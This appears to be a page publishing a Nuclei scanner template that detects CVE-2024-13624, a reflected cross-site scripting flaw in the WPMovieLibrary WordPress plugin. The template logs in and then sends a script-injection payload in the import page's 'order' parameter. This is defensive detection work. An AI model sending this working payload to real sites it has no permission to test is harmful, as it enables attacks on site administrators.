Skip to content

WordPress WPMovieLibrary Plugin <= 2.1.4.8 - Cross-Site Scripting

ID: CVE-2024-13624

Severity: high

Author: ritikchaddha

Tags: cve,cve2024,wp,wordpress,wp-plugin,xss,wpmovielibrary,authenticated

The WPMovieLibrary WordPress plugin through version 2.1.4.8 contains a reflected cross-site scripting vulnerability. The plugin does not properly sanitize and escape the ‘order’ parameter in the import page before outputting it back, which could allow attackers to execute arbitrary JavaScript code in an administrator’s browser context.

id: CVE-2024-13624
info:
name: WordPress WPMovieLibrary Plugin <= 2.1.4.8 - Cross-Site Scripting
author: ritikchaddha
severity: high
description: |
The WPMovieLibrary WordPress plugin through version 2.1.4.8 contains a reflected cross-site scripting vulnerability. The plugin does not properly sanitize and escape the 'order' parameter in the import page before outputting it back, which could allow attackers to execute arbitrary JavaScript code in an administrator's browser context.
reference:
- https://wpscan.com/vulnerability/c19b56cc-634f-420f-b6a0-9a10ad159049
- https://nvd.nist.gov/vuln/detail/CVE-2024-13624
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N
cvss-score: 7.1
cve-id: CVE-2024-13624
cwe-id: CWE-79
metadata:
verified: true
max-request: 2
product: wpmovielibrary
fofa-query: body="wp-content/plugins/wpmovielibrary/"
tags: cve,cve2024,wp,wordpress,wp-plugin,xss,wpmovielibrary,authenticated
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
redirects: true
matchers:
- type: word
part: body
words:
- 'wpmovielibrary'
internal: true
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin.php?page=wpmovielibrary-import&order=1%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cscript%3E HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"></script><script>alert(document.domain)</script><script>'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 4a0a00473045022100dce7560a1185be1bf063d8a8ba2a819319b2b97cf090de0a23b2aa2bfe8ab40e0220362f70f88934205271412273484bd884410aee5403a73638b6d653fda0141b15:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-13624.yaml"

View on Github